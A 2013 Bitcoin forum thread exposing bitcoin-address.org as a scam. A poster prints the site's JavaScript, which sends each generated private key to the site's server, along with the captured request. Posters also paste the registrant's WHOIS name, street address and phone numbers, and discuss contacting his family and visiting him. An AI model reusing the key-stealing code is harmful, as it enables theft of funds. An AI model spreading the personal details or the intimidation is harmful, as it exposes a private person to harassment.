theymos (OP)
Administrator
Legendary
 Offline
Activity: 5376
Merit: 13410
|
 |
May 28, 2013, 02:09:17 AM |
|
Bitcoin-address.org was being spammed by JayKEy00. It's malicious, right?
|
1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD
|
|
|
|
OpenYourEyes
|
|
May 28, 2013, 07:12:23 PM
Last edit: May 29, 2013, 12:23:02 AM by OpenYourEyes |
|
Certainly seems so. There is a javascript function at the bottom of the page which seems to send the public/private key off in an email: ...
btcaddressEmail=document.getElementById('btcaddress'+kk).innerHTML;
var privateKeyEmail=document.getElementById('btcprivwif'+kk).innerHTML;
var dataToSend=new Object();
dataToSend.btcaddressEmail=btcaddressEmail;
dataToSend.privateKeyEmail=privateKeyEmail;
sendToServer(dataToSend);
})(count);
count--;
}
}
function sendToServer(dataToSend){
$.ajax({
url:"sendEmail.php",
type:"post",
data:dataToSend,
success:function(json){
console.log(json);
console.log("DONE");
},
error:function(){
console.log("error");
}
});
}
And here's the POST headers each time a new address is generated: Accept:*/*
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-GB,en-US;q=0.8,en;q=0.6
Connection:keep-alive
Content-Length:118
Content-Type:application/x-www-form-urlencoded; charset=UTF-8
DNT:1
Host:www.bitcoin-address.org
Origin:http://www.bitcoin-address.org
Referer:http://www.bitcoin-address.org/
User-Agent:
X-Requested-With:XMLHttpRequest
Form Dataview sourceview URL encoded
btcaddressEmail:147NH6jMB5AXBEhqF3GxyiuxAPv4MCcYHW
privateKeyEmail:5J9snkqjAQ5sB4JSm4GnsErvmoyux7dvaM5hRpiayvkoaQm2P2U
Registrant Name:Jan Kuhn
Registrant Street1:Herzbachweg 22
Registrant Street2:
Registrant Street3:
Registrant City:Gelnhausen
Registrant State/Province:
Registrant Postal Code:63571
Registrant Country:DE
Registrant Phone:+49.51818553717
Registrant Phone Ext.:
Registrant FAX:+49.51818553718 |
|
|
|
jackjack
Legendary
Offline
Activity: 1176
Merit: 1280
May Bitcoin be touched by his Noodly Appendage
|
|
May 28, 2013, 08:59:02 PM |
|
I'm sure it's only for statistics  |
Own address: 19QkqAza7BHFTuoz9N8UQkryP4E9jHo4N3 - Pywallet support: 1AQDfx22pKGgXnUZFL1e4UKos3QqvRzNh5 - Bitcointalk++ script support: 1Pxeccscj1ygseTdSV1qUqQCanp2B2NMM2 Pywallet: instructions. Encrypted wallet support, export/import keys/addresses, backup wallets, export/import CSV data from/into wallet, merge wallets, delete/import addresses and transactions, recover altcoins sent to bitcoin addresses, sign/verify messages and files with Bitcoin addresses, recover deleted wallets, etc. |
|
|
|
OpenYourEyes
|
|
May 29, 2013, 12:20:51 AM |
|
I'm sure it's only for statistics Indeed. I'm sure I can find him some marketing companies that would be very interested in them.  And, yet, the scammers account and his AE/shrills still remain active.  |
|
|
|
kodo
Newbie
Offline
Activity: 42
Merit: 0
|
|
May 29, 2013, 04:23:07 AM |
|
So what does the site do thats malicious?
|
|
|
|
|
|
greyhawk
|
|
May 29, 2013, 08:17:53 AM |
|
Registrant Name:Jan Kuhn
Registrant Street1:Herzbachweg 22
Registrant Street2:
Registrant Street3:
Registrant City:Gelnhausen
Registrant State/Province:
Registrant Postal Code:63571
Registrant Country:DE
Registrant Phone:+49.51818553717
Registrant Phone Ext.:
Registrant FAX:+49.51818553718 That's an 18 year old chess talent living at home with his father who's a defense lawyer. At least he doesn't have to go very far when the crackdown cracks down. |
|
|
|
|
|
OpenYourEyes
|
|
May 29, 2013, 01:25:33 PM |
|
So what does the site do thats malicious?
Nothing, unless you don't mind the private key being email to the site owner which then gives them full access to any funds sent to one of their generated addresses. Edit: Aha. Seems he has taking the site down. Hope it is because of a script I had an a loop which generated over 10,000 BTC addresses, bet his inbox is pretty full. |
|
|
|
|
greyhawk
|
|
May 29, 2013, 01:33:35 PM |
|
And I didn't even call his father yet...  |
|
|
|
|
|
OpenYourEyes
|
|
May 29, 2013, 01:36:31 PM |
|
And I didn't even call his father yet... Is your bio on him legit? Source? I've got a copy of the website, so I'll quite happily contact his family |
|
|
|
|
greyhawk
|
|
May 29, 2013, 01:42:18 PM |
|
And I didn't even call his father yet... Is your bio on him legit? Source? Only as legit as the WHOIS entry. So there's always the possibility of someone having entered another one's adress. In any case he deleted it now. Seems to have gotten the message. Also he's like an hour away from where I am. So there's no problem in going there to split a neighbourly piece of cake. |
|
|
|
|
|
niko
|
|
May 31, 2013, 02:43:17 PM |
|
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet. I know Tibanne started working on this, but not sure how far they got.
|
They're there, in their room.
Your mining rig is on fire, yet you're very calm.
|
|
|
|
Lohoris
|
|
May 31, 2013, 03:05:31 PM |
|
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet.
Very wrong: even if it was trademarked, scam sites could still pop-up, and since they are likely already illegal anyway, they wouldn't care about the trademark and do it anyway. It's like DRM: legit business would be hurt, while criminals would be unaffected. |
|
|
|
|
niko
|
|
June 01, 2013, 02:12:29 AM |
|
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet.
Very wrong: even if it was trademarked, scam sites could still pop-up, and since they are likely already illegal anyway, they wouldn't care about the trademark and do it anyway. It's like DRM: legit business would be hurt, while criminals would be unaffected. How come there is no citi-bank.com where I would be asked to log in? |
They're there, in their room.
Your mining rig is on fire, yet you're very calm.
|
|
|
|
Lohoris
|
|
June 03, 2013, 08:15:55 AM |
|
How come there is no citi-bank.com where I would be asked to log in?
are you serious? |
|
|
|
|
niko
|
|
June 03, 2013, 11:15:25 AM
Last edit: June 03, 2013, 11:25:31 AM by niko |
|
How come there is no citi-bank.com where I would be asked to log in?
are you serious?Again, none of them use TLD with "citi" and "bank" in its name. Otherwise they wouldn't have to try all the tricks to spoof or mask the actual link. Trademarking "bitcoin" would make phishing harder and less effective, as it opens the perpetrators to additional legal risk. |
They're there, in their room.
Your mining rig is on fire, yet you're very calm.
|
|
|
escrow.ms
Legendary
Offline
Activity: 1274
Merit: 1004
|
|
June 03, 2013, 11:24:57 AM |
|
How come there is no citi-bank.com where I would be asked to log in?
are you serious?Again, none of them use TLD with "citi" and "bank" in its name. Otherwise they wouldn't have to try all the tricks to spoof or mask the actual link. Trademarking "bitcoin" would make phishing harder and less effective. Wrong,They don't do because stealing money from banks isn't easy. Plus there are several TLD's available for registration. Take a Look at this thread. https://bitcointalk.org/index.php?topic=219284.0;topicseen |
|
|
|
|
|
